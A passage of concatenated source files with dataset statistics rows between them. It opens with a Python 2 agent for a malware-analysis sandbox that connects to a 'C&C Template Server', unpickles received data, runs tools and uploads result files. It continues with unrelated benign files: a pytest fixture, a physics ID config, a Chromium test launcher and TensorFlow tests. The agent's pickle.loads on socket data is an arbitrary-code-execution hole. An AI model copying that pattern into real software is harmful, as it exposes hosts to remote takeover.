if DEBUG: print "Custom Parameters Vars {} - Parameters({})".format(custom_user_vars, parameters)
filtered_parameters = self.filter_variables(
parameters, template, filter_type='parameters', custom_user_vars=custom_user_vars)
else:
filtered_parameters = self.filter_variables(
parameters, template, filter_type='parameters', custom_user_vars=None)
return filtered_parameters
if filter_type == "automation":
automation = template.actions[template.actions.action]['automation']
if automation is not None:
if DEBUG: print "Automation: {}".format(automation)
if len(custom_user_vars) != 0:
if DEBUG: print "Custom Automation Vars {}".format(custom_user_vars)
filtered_automation = self.filter_variables(
automation, template, filter_type='automation', custom_user_vars=custom_user_vars)
else:
filtered_automation = self.filter_variables(
automation, template, filter_type='automation', custom_user_vars=None)
return filtered_automation
action_name = template.actions.action
if DEBUG: print "Executing: {}".format(action_name)
filtered_parameters = filter_custom_vars(template, filter_type='parameters')
filtered_automation = filter_custom_vars(template, filter_type='automation')
selected_execution(filtered_parameters, filtered_automation)
class TemplateManager(ExecutionManager):
def __init__(self, template):
# self.report_directory_check(template.vm_report_name)
if DEBUG: print "#"*50
if DEBUG: print dict(template)
if DEBUG: print "#"*50
# Each tool request must save files. Those can be either a log file
# or output files from its execution. This "report path" folder will
# be created per request.
#
# The /files/ folder will be used to store any additional files generated
# by the tool.
self.report_path_files = os.path.join(
APP_DATA, template.rid, template.tool_name, 'files')
self.report_path = os.path.join(
APP_DATA, template.rid, template.tool_name)
if not os.path.isdir(self.report_path_files):
if DEBUG: print "Creating: {}".format(self.report_path_files)
os.makedirs(self.report_path_files)
if template.configuration.execution['download_sample']:
self.download_file(template.download_url)
# Tool execution will eventually select which execution type will be run,
# either automated or manual (only based in parameters)
self.tool_execution(template)
# Delay (seconds) between tool executions.
exec_delay = template.configuration.execution.delay
if DEBUG: print "Execution Delay (in seconds): {}".format(exec_delay)
time.sleep(exec_delay)
while True:
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
threads = str(threading.enumerate()).lower()
if template.configuration.execution.background_run:
if DEBUG: print "TOOL DOES RUN IN BACKGROUND..."
if template.tool.filename.lower() in threads:
# FIXED: This allows more than one tool running in background
if threading.active_count() != 1:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK DONE"
break
else:
if DEBUG: print "TOOL DOES NOT RUN IN BACKGROUND..."
if template.tool.filename.lower() not in threads:
if "autoit" not in threads:
if DEBUG: print "TOOL RUN CHECK - DONE"
break
time.sleep(1)
if DEBUG: print "\n###### Tool execution has ended #######\n"
if DEBUG: print threading.active_count()
if DEBUG: print threading.enumerate()
if template.configuration.reporting.report_files:
if DEBUG: print "########## Starting COLLECTING HTTP FILES ##############"
self.report(template)
def filter_variables(self, data, template, filter_type=None, custom_user_vars=None):
if filter_type == "parameters":
# Convert into list here.
data = data.split(' ')
if filter_type == "automation":
# Decode first, then convert into a list.
data = base64.decodestring(data).split('\n')
if DEBUG: print "Filtering Variables: {}".format(data)
unfiltered_data = FilterSpecialVars(data, template=template, custom_user_vars=custom_user_vars)
unfiltered_data.filter_now()
if DEBUG: print "Filtered Args: ({})".format(unfiltered_data.filtered_data)
if filter_type == "parameters":
return " ".join(unfiltered_data.filtered_data)
if filter_type == "automation":
return unfiltered_data.filtered_data
def report_back(self, report_data):
url = "http://{}:{}/bph/report.php".format(BPH_TEMPLATE_SERVER_IP, BPH_CONTROLLER_WEB_PORT)
files = {'file': open(report_data['file_abs_path'], 'rb')}
response = requests.post(url, data={'project_name': report_data['project_name'],
'md5': report_data['md5'],
'sid': report_data['sid'],
'tool': report_data['tool_name'],
'rid': report_data['rid'],
'file': report_data['file'],
'dir': report_data['dir']}, files=files)
if DEBUG: print "Response: {}".format(response.text)
def report_files(self, base_folder, tool_name):
if DEBUG: print "Searching files in: {} - tool: {}".format(base_folder, tool_name)
while True:
if len(os.listdir(base_folder)) != 0:
if DEBUG: print "Files found.. Collecting them now..."
files_found = []
for root, dirs, files in os.walk(base_folder):
for file in files:
full_path = os.path.join(root, file)
if DEBUG: print "FullPath: {}".format(full_path)
file_name = os.path.basename(full_path)
if DEBUG: print "FileName: {}".format(file_name)
index = full_path.split('\\').index(tool_name)
if DEBUG: print "Index: {}".format(index)
path_found = "/".join([x for x in full_path.split('\\')[index+1:]])
if DEBUG: print "PathFound: {}".format(path_found)
if path_found.count('/') == 0:
# Tool log file was found (e.g. bintext.log)
if DEBUG: print "Found log file: {}".format(path_found)
if path_found.endswith('.log'):
if DEBUG: print "FullPath: {}".format(full_path)
file_and_path_found = [full_path, path_found, '/']
files_found.append(file_and_path_found)
else:
# Any file inside of the /files/ folder.
if DEBUG: print "Found non-log file: {}".format(path_found)
# For non-log files, a file version of the file will be generated
# due problems of uploading big files through HTTP. This is a temporary fix.
zip_filename = File().zip_file(full_path)
file_and_path_found = zip_filename.split() + \
path_found.split('/')[:-1]
if DEBUG: print file_and_path_found
file_and_path_found.insert(
0, full_path.replace(file_name, zip_filename))
if file_and_path_found not in files_found:
if DEBUG: print "Appending file found: {}".format(file_and_path_found)
files_found.append(file_and_path_found)
if DEBUG: print "FullPathFound: {}".format(file_and_path_found)
if DEBUG: print "Files Found: {}".format(files_found)
return list(files_found)
else:
if DEBUG: print "Waiting for files to appear..."
time.sleep(1)
def report(self, template):
def filter_dir(unfiltered_dir):
if DEBUG: print "Unfiltered dir: {}".format(unfiltered_dir)
dir_path = "/".join(unfiltered_dir)
if dir_path.startswith('/'):
return unfiltered_dir[0]
return "/{}".format(dir_path)
report_data = {}
if os.path.isdir(self.report_path):
if DEBUG: print "Sending back results to C&C server..."
# Request variables. Generate data on the server.
report_data['project_name'] = template.project_name
report_data['md5'] = template.md5
report_data['sid'] = template.sid
report_data['rid'] = template.rid
report_data['tool_name'] = template.tool_name
for file_found in self.report_files(self.report_path,
template.tool_name):
# if DEBUG: print "FileFound: {}".format(file_found)
report_data['file_abs_path'] = file_found[0]
report_data['file'] = urllib.quote(file_found[1], safe='')
report_data['dir'] = filter_dir(file_found[2:])
if DEBUG: print report_data
self.report_back(report_data)
if DEBUG: print "Done."
else:
if DEBUG: print "Report Directory ({}) does not exist".format(self.report_path)
def report_directory_check(self, vm_report_name):
report_path = os.path.join(APP_DATA, vm_report_name)
if DEBUG:
print report_path
if not os.path.isdir(report_path):
os.mkdir(report_path)
self.report_directory_check()
else:
REPORT_PATH = report_path
class Agent:
RETRY_SECS = 1
BUFFER_SIZE = 16384
def __init__(self):
self.connection_status = False
#### Agent Control Functions ####
def start(self):
print "Starting Agent..."
# Connect to Server
self.connect()
def stop(self):
print "Stopping Agent..."
self.disconnect()
self.connection_status = False
def restart(self):
self.stop()
self.start()
#### Agent Connection Functions ####
def check_connection(self):
pass
# print dir(self._clientsocket)
def is_connected(self):
if self.connection_status == True:
return True
return False
def send(self, data):
print "Sending Data: {}".format(data)
try:
self._clientsocket.send(data)
except:
self.reconnect()
def listen(self):
print "Connected to C&C Template Server. Waiting for instructions..."
try:
while True:
# Keeps running receiving data. Once received
# it its automatically un-serialized and converted
# into an Python dictionary object.
serialized_data = pickle.loads(self._clientsocket.recv(self.BUFFER_SIZE))
template_data = box.Box(serialized_data)
# TemplateManager decomposes serialized data
# and take actions to execute the selected program
TemplateManager(template_data)
print "Sending back to C&C => OK status"
self.send('ok')
except socket.error as e:
print "Server disconnection: {}".format(e)
self.reconnect()
except EOFError as e:
print "Server disconnection...".format(e)
self.reconnect()
else:
# If template data was received correctly, then acknowledge.
self.send('skip')
def connect(self):
# Make the connection to the server
print "Connecting to C&C Template Server: {}:{}".format(BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT)
try:
# Initialize Socket & connect back to server.
self._clientsocket = socket.socket()
self._clientsocket.connect((BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT))
self._clientsocket.setblocking(1)
except socket.error:
self.reconnect()
except KeyboardInterrupt:
print "Interrupting execution."
sys.exit()
else:
print "Connection established. "
self.connection_status = True
self.listen()
def disconnect(self):
self._clientsocket.close()
def reconnect(self):
print "Reconnecting...."
if DEBUG: print "Connection Error. Server down? Attempting connection in: ({}) seconds".format(self.RETRY_SECS)
time.sleep(self.RETRY_SECS)
if DEBUG: print "Attempting now..."
self.connect()
if __name__ == "__main__":
agent = Agent()
try:
agent.start()
while True:
# agent.check_connection()
if not agent.is_connected():
# If agent stops. Start it again.
agent.start()
except KeyboardInterrupt:
print "Manual interruption. Bye!"
sys.exit()
| 40.552822 | 126 | 0.554386 | 2,993 | 28,022 | 4.972269 | 0.153024 | 0.03904 | 0.06612 | 0.009676 | 0.290149 | 0.211867 | 0.143395 | 0.120817 | 0.096761 | 0.06733 | 0 | 0.003707 | 0.355078 | 28,022 | 690 | 127 | 40.611594 | 0.819776 | 0.1006 | 0 | 0.217759 | 0 | 0 | 0.12152 | 0.010727 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.014799 | 0.046512 | null | null | 0.20296 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
469a1ea0ba86db2759c0a614f1ca8112b547ba08 | 277 | py | Python | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | null | null | null | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | 7 | 2020-06-19T15:32:07.000Z | 2021-08-23T20:49:39.000Z | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | null | null | null | from datetime import timedelta
import pytest
from model_bakery import baker
@pytest.fixture()
def create_expire_user():
def make_user(**kwargs):
user = baker.make('members.User')
user.created -= timedelta(days=4)
return user
return make_user
| 19.785714 | 41 | 0.693141 | 36 | 277 | 5.194444 | 0.555556 | 0.085562 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004608 | 0.216607 | 277 | 13 | 42 | 21.307692 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.043321 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.3 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
469d18528989ab40a67eb477eeda37c2533ddfd8 | 5,448 | py | Python | RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Fall17_noIso_V1_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Fall17_noIso_V1_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Fall17_noIso_V1_cff.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
from RecoEgamma.ElectronIdentification.Identification.mvaElectronID_tools import *
# Documentation of the MVA
# https://twiki.cern.ch/twiki/bin/viewauth/CMS/MultivariateElectronIdentificationRun2
# https://rembserj.web.cern.ch/rembserj/notes/Electron_MVA_ID_2017_documentation
#
# In this file we define the locations of the MVA weights, cuts on the MVA values
# for specific working points, and configure those cuts in VID
#
# The tag is an extra string attached to the names of the products
# such as ValueMaps that needs to distinguish cases when the same MVA estimator
# class is used with different tuning/weights
mvaTag = "Fall17NoIsoV1"
# There are 6 categories in this MVA. They have to be configured in this strict order
# (cuts and weight files order):
# 0 EB1 (eta<0.8) pt 5-10 GeV | pt < ptSplit && |eta| < ebSplit
# 1 EB2 (eta>=0.8) pt 5-10 GeV | pt < ptSplit && |eta| >= ebSplit && |eta| < ebeeSplit
# 2 EE pt 5-10 GeV | pt < ptSplit && |eta| >= ebeeSplit
# 3 EB1 (eta<0.8) pt 10-inf GeV | pt >= ptSplit && |eta| < ebSplit
# 4 EB2 (eta>=0.8) pt 10-inf GeV | pt >= ptSplit && |eta| >= ebSplit && |eta| < ebeeSplit
# 5 EE pt 10-inf GeV | pt >= ptSplit && |eta| >= ebeeSplit
mvaFall17WeightFiles_V1 = cms.vstring(
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB1_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB2_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EE_5_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB1_10_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EB2_10_2017_puinfo_BDT.weights.xml.gz",
"RecoEgamma/ElectronIdentification/data/Fall17/EIDmva_EE_10_2017_puinfo_BDT.weights.xml.gz"
)
## The working point for this MVA that is expected to have about 90% signal
# WP tuned to give about 90 and 80% signal efficiecny for electrons from Drell-Yan with pT > 25 GeV
# The working point for the low pt categories is just taken over from the high pt
idName90 = "mvaEleID-Fall17-noIso-V1-wp90"
MVA_WP90 = EleMVA_WP(
idName = idName90, mvaTag = mvaTag,
cutCategory0 = "0.9165112826974601 - exp(-pt / 2.7381703555094217) * 1.03549199648109", # EB1 low pt
cutCategory1 = "0.8655738322220173 - exp(-pt / 2.4027944652597073) * 0.7975615613282494", # EB2 low pt
cutCategory2 = "-3016.035055227131 - exp(-pt / -52140.61856333602) * -3016.3029387236506", # EE low pt
cutCategory3 = "0.9616542816132922 - exp(-pt / 8.757943837889817) * 3.1390200321591206", # EB1
cutCategory4 = "0.9319258011430132 - exp(-pt / 8.846057432565809) * 3.5985063793347787", # EB2
cutCategory5 = "0.8899260780999244 - exp(-pt / 10.124234115859881) * 4.352791250718547", # EE
)
idName80 = "mvaEleID-Fall17-noIso-V1-wp80"
MVA_WP80 = EleMVA_WP(
idName = idName80, mvaTag = mvaTag,
cutCategory0 = "0.9530240956555949 - exp(-pt / 2.7591425841003647) * 0.4669644718545271", # EB1 low pt
cutCategory1 = "0.9336564763961019 - exp(-pt / 2.709276284272272) * 0.33512286599215946", # EB2 low pt
cutCategory2 = "0.9313133688365339 - exp(-pt / 1.5821934800715558) * 3.8889462619659265", # EE low pt
cutCategory3 = "0.9825268564943458 - exp(-pt / 8.702601455860762) * 1.1974861596609097", # EB1
cutCategory4 = "0.9727509457929913 - exp(-pt / 8.179525631018565) * 1.7111755094657688", # EB2
cutCategory5 = "0.9562619539540145 - exp(-pt / 8.109845366281608) * 3.013927699126942", # EE
)
### WP tuned for HZZ analysis with very high efficiency (about 98%)
# The working points were found by requiring the same signal efficiencies in
# each category as for the Spring 16 HZZ ID
# (see RecoEgamma/ElectronIdentification/python/Identification/mvaElectronID_Spring16_HZZ_V1_cff.py)
idNamewpLoose = "mvaEleID-Fall17-noIso-V1-wpLoose"
MVA_WPLoose = EleMVA_WP(
idName = idNamewpLoose, mvaTag = mvaTag,
cutCategory0 = "-0.13285867293779202", # EB1 low pt
cutCategory1 = "-0.31765300958836074", # EB2 low pt
cutCategory2 = "-0.0799205914718861" , # EE low pt
cutCategory3 = "-0.856871961305474" , # EB1
cutCategory4 = "-0.8107642141584835" , # EB2
cutCategory5 = "-0.7179265933023059" # EE
)
#
# Finally, set up VID configuration for all cuts
#
# Create the PSet that will be fed to the MVA value map producer
mvaEleID_Fall17_noIso_V1_producer_config = cms.PSet(
mvaName = cms.string(mvaClassName),
mvaTag = cms.string(mvaTag),
# Category parameters
nCategories = cms.int32(6),
categoryCuts = cms.vstring(*EleMVA_6CategoriesCuts),
# Weight files and variable definitions
weightFileNames = mvaFall17WeightFiles_V1,
variableDefinition = cms.string("RecoEgamma/ElectronIdentification/data/ElectronMVAEstimatorRun2Fall17V1Variables.txt")
)
# Create the VPset's for VID cuts
mvaEleID_Fall17_V1_wpLoose = configureVIDMVAEleID( MVA_WPLoose )
mvaEleID_Fall17_V1_wp90 = configureVIDMVAEleID( MVA_WP90 )
mvaEleID_Fall17_V1_wp80 = configureVIDMVAEleID( MVA_WP80 )
mvaEleID_Fall17_V1_wpLoose.isPOGApproved = cms.untracked.bool(True)
mvaEleID_Fall17_V1_wp90.isPOGApproved = cms.untracked.bool(True)
mvaEleID_Fall17_V1_wp80.isPOGApproved = cms.untracked.bool(True)
| 54.48 | 124 | 0.727423 | 693 | 5,448 | 5.611833 | 0.350649 | 0.015428 | 0.064798 | 0.023142 | 0.253793 | 0.195166 | 0.181281 | 0.157367 | 0.132168 | 0.132168 | 0 | 0.202083 | 0.171623 | 5,448 | 99 | 125 | 55.030303 | 0.65965 | 0.36362 | 0 | 0 | 0 | 0 | 0.498389 | 0.207735 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.036364 | 0 | 0.036364 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
469d44404e5e5089163e7fb2cbe8fd08587f00ec | 4,274 | py | Python | tools/parallel_launcher/parallel_launcher.py | Gitman1989/chromium | 2b1cceae1075ef012fb225deec8b4c8bbe4bc897 | [
"BSD-3-Clause"
] | 2 | 2017-09-02T19:08:28.000Z | 2021-11-15T15:15:14.000Z | tools/parallel_launcher/parallel_launcher.py | meego-tablet-ux/meego-app-browser | 0f4ef17bd4b399c9c990a2f6ca939099495c2b9c | [
"BSD-3-Clause"
] | null | null | null | tools/parallel_launcher/parallel_launcher.py | meego-tablet-ux/meego-app-browser | 0f4ef17bd4b399c9c990a2f6ca939099495c2b9c | [
"BSD-3-Clause"
] | 1 | 2020-11-04T07:22:28.000Z | 2020-11-04T07:22:28.000Z | #!/usr/bin/python
# Copyright (c) 2010 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
This tool launches several shards of a gtest-based binary
in parallel on a local machine.
Example usage:
parallel_launcher.py path/to/base_unittests
"""
import optparse
import os
import subprocess
import sys
import threading
import time
def StreamCopyWindows(stream_from, stream_to):
"""Copies stream_from to stream_to."""
while True:
buf = stream_from.read(1024)
if not buf:
break
stream_to.write(buf)
stream_to.flush()
def StreamCopyPosix(stream_from, stream_to, child_exited):
"""
Copies stream_from to stream_to, and exits if child_exited
is signaled.
"""
import fcntl
# Put the source stream in a non-blocking mode, so we can check
# child_exited when there is no data.
fd = stream_from.fileno()
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
while True:
try:
buf = os.read(fd, 1024)
except OSError, e:
if e.errno == 11:
if child_exited.isSet():
break
time.sleep(0.1)
continue
raise
if not buf:
break
stream_to.write(buf)
stream_to.flush()
class TestLauncher(object):
def __init__(self, args, executable, num_shards, shard):
self._args = args
self._executable = executable
self._num_shards = num_shards
self._shard = shard
self._test = None
def launch(self):
env = os.environ.copy()
env['CHROME_LOG_FILE'] = 'chrome_log_%d' % self._shard
if 'GTEST_TOTAL_SHARDS' in env:
# Handle the requested sharding transparently.
outer_shards = int(env['GTEST_TOTAL_SHARDS'])
outer_index = int(env['GTEST_SHARD_INDEX'])
env['GTEST_TOTAL_SHARDS'] = str(self._num_shards * outer_shards)
# Calculate the right shard index to pass to the child. This is going
# to be a shard of a shard.
env['GTEST_SHARD_INDEX'] = str((self._num_shards * outer_index) +
self._shard)
else:
env['GTEST_TOTAL_SHARDS'] = str(self._num_shards)
env['GTEST_SHARD_INDEX'] = str(self._shard)
args = self._args + ['--test-server-shard=' + str(self._shard)]
self._test = subprocess.Popen(args=args,
executable=self._executable,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env)
def wait(self):
if subprocess.mswindows:
stdout_thread = threading.Thread(
target=StreamCopyWindows,
args=[self._test.stdout, sys.stdout])
stdout_thread.start()
code = self._test.wait()
stdout_thread.join()
return code
else:
child_exited = threading.Event()
stdout_thread = threading.Thread(
target=StreamCopyPosix,
args=[self._test.stdout, sys.stdout, child_exited])
stdout_thread.start()
code = self._test.wait()
child_exited.set()
stdout_thread.join()
return code
def main(argv):
parser = optparse.OptionParser()
parser.add_option("--shards", type="int", dest="shards", default=10)
# Make it possible to pass options to the launched process.
# Options for parallel_launcher should be first, then the binary path,
# and finally - optional arguments for the launched binary.
parser.disable_interspersed_args()
options, args = parser.parse_args(argv)
if not args:
print 'You must provide path to the test binary'
return 1
env = os.environ
if bool('GTEST_TOTAL_SHARDS' in env) != bool('GTEST_SHARD_INDEX' in env):
print 'Inconsistent environment. GTEST_TOTAL_SHARDS and GTEST_SHARD_INDEX'
print 'should either be both defined, or both undefined.'
return 1
launchers = []
for shard in range(options.shards):
launcher = TestLauncher(args, args[0], options.shards, shard)
launcher.launch()
launchers.append(launcher)
return_code = 0
for launcher in launchers:
if launcher.wait() != 0:
return_code = 1
return return_code
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| 27.574194 | 78 | 0.656996 | 569 | 4,274 | 4.746924 | 0.347979 | 0.023695 | 0.035542 | 0.021103 | 0.218808 | 0.139208 | 0.081451 | 0.057016 | 0.0311 | 0.0311 | 0 | 0.007754 | 0.245672 | 4,274 | 154 | 79 | 27.753247 | 0.830025 | 0.139916 | 0 | 0.247525 | 0 | 0 | 0.1141 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.069307 | null | null | 0.029703 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
46a4f53ed5b4a611b18a262f155eca68d71783fb | 7,831 | py | Python | test/python/test_elementwise_ops.py | avijit-chakroborty/ngraph-bridge | b691d57412a40582ea93c6e564d80c750b7f2e8e | [
"Apache-2.0"
] | 142 | 2019-02-21T00:53:06.000Z | 2022-03-11T07:46:28.000Z | test/python/test_elementwise_ops.py | tensorflow/ngraph | ea6422491ec75504e78a63db029e7f74ec3479a5 | [
"Apache-2.0"
] | 252 | 2019-03-11T19:27:59.000Z | 2021-03-19T10:58:17.000Z | test/python/test_elementwise_ops.py | tensorflow/ngraph | ea6422491ec75504e78a63db029e7f74ec3479a5 | [
"Apache-2.0"
] | 65 | 2019-03-13T15:27:29.000Z | 2021-07-16T07:09:16.000Z | # ==============================================================================
# Copyright 2018-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""nGraph TensorFlow bridge elementwise operations test
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import numpy as np
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
from common import NgraphTest
class TestElementwiseOperations(NgraphTest):
@pytest.mark.parametrize(("v1", "v2", "expected"),
((1.0, -1.0, [1.0]), (100, 200, ([200],)),
([0.0, 5.0, 10.0], [6.0],
(np.array([[6.0, 6.0, 10.0]]),))))
def test_maximum(self, v1, v2, expected):
val1 = tf.compat.v1.placeholder(tf.float32, shape=(None))
val2 = tf.compat.v1.placeholder(tf.float32, shape=(None))
out = tf.maximum(val1, val2)
sess_fn = lambda sess: sess.run((out,),
feed_dict={
val1: (v1,),
val2: (v2,)
})[0]
assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
assert (self.with_ngraph(sess_fn) == expected).all()
@pytest.mark.parametrize(
("v1", "v2", "expected"),
((1.4, 1.0, [False]), (-1.0, -1.0, ([True],)), (-1.0, 1000, [True]),
(200, 200, ([True],)), ([-1.0, 1.0, -4], [0.1, 0.1, -4],
(np.array([[True, False, True]]),)),
([-1.0, 1.0, -4], [-1.0], (np.array([[True, False, True]]),))))
def test_less_equal(self, v1, v2, expected):
val1 = tf.compat.v1.placeholder(tf.float32, shape=(None))
val2 = tf.compat.v1.placeholder(tf.float32, shape=(None))
out = tf.less_equal(val1, val2)
sess_fn = lambda sess: sess.run((out,),
feed_dict={
val1: (v1,),
val2: (v2,)
})[0]
assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
assert (self.with_ngraph(sess_fn) == expected).all()
@pytest.mark.parametrize(
("v1", "v2", "expected"),
((1.4, 1.0, [False]), (-1.0, -1.0, ([False],)), (-1.0, 1000, [True]),
(200, 200, ([False],)), ([-1.0, 1.0, -4], [0.1, 0.1, -4],
(np.array([[True, False, False]]),)),
([-1.0, 1.0, -4], [-1.0], (np.array([[False, False, True]]),))))
def test_less(self, v1, v2, expected):
val1 = tf.compat.v1.placeholder(tf.float32, shape=(None))
val2 = tf.compat.v1.placeholder(tf.float32, shape=(None))
out = tf.less(val1, val2)
sess_fn = lambda sess: sess.run((out,),
feed_dict={
val1: (v1,),
val2: (v2,)
})[0]
assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
assert (self.with_ngraph(sess_fn) == expected).all()
@pytest.mark.parametrize(
("v1", "v2", "expected"),
((1.4, 1.0, [True]), (-1.0, -1.0, ([True],)), (-1.0, 1000, [False]),
(200, 200, ([True],)), ([-1.0, 1.0, -4], [0.1, 0.1, -4],
(np.array([[False, True, True]]),)),
([-1.0, 1.0, -4], [-1.0], (np.array([[True, True, False]]),))))
def test_greater_equal(self, v1, v2, expected):
val1 = tf.compat.v1.placeholder(tf.float32, shape=(None))
val2 = tf.compat.v1.placeholder(tf.float32, shape=(None))
out = tf.greater_equal(val1, val2)
sess_fn = lambda sess: sess.run((out,),
feed_dict={
val1: (v1,),
val2: (v2,)
})[0]
assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
assert (self.with_ngraph(sess_fn) == expected).all()
@pytest.mark.parametrize(
("v1", "v2", "expected"),
((1.4, 1.0, [True]), (-1.0, -1.0, ([False],)), (-1.0, 1000, [False]),
(200, 200, ([False],)), ([-1.0, 1.0, -4], [0.1, 0.1, -4],
(np.array([[False, True, False]]),)),
([-1.0, 1.0, -4], [-1.0], (np.array([[False, True, False]]),))))
def test_greater(self, v1, v2, expected):
val1 = tf.compat.v1.placeholder(tf.float32, shape=(None))
val2 = tf.compat.v1.placeholder(tf.float32, shape=(None))
out = tf.greater(val1, val2)
sess_fn = lambda sess: sess.run((out,),
feed_dict={
val1: (v1,),
val2: (v2,)
})[0]
assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
assert (self.with_ngraph(sess_fn) == expected).all()
@pytest.mark.parametrize(("v1", "v2", "expected"),
((True, True, [True]), (True, False, ([False],)),
(1.0, -2.0, ([True],)), (False, 100, ([False],)),
([False, True, False], [True],
(np.array([[False, True, False]]),))))
def test_logical_and(self, v1, v2, expected):
val1 = tf.compat.v1.placeholder(tf.bool, shape=(None))
val2 = tf.compat.v1.placeholder(tf.bool, shape=(None))
out = tf.logical_and(val1, val2)
sess_fn = lambda sess: sess.run((out,),
feed_dict={
val1: (v1,),
val2: (v2,)
})[0]
assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
assert (self.with_ngraph(sess_fn) == expected).all()
@pytest.mark.parametrize(("test_input", "expected"), ((False, True),
(True, False)))
def test_logicalnot_1d(self, test_input, expected):
val = tf.compat.v1.placeholder(tf.bool, shape=(1,))
out = tf.logical_not(val)
sess_fn = lambda sess: sess.run((out,), feed_dict={val: (test_input,)})[
0]
assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
assert (self.with_ngraph(sess_fn) == expected).all()
def test_logicalnot_2d(self):
test_input = ((True, False, True), (False, True, False))
expected = np.logical_not(test_input)
val = tf.compat.v1.placeholder(tf.bool, shape=(2, 3))
out = tf.logical_not(val)
sess_fn = lambda sess: sess.run((out,), feed_dict={val: test_input})[0]
assert (self.with_ngraph(sess_fn) == self.without_ngraph(sess_fn)).all()
assert (self.with_ngraph(sess_fn) == expected).all()
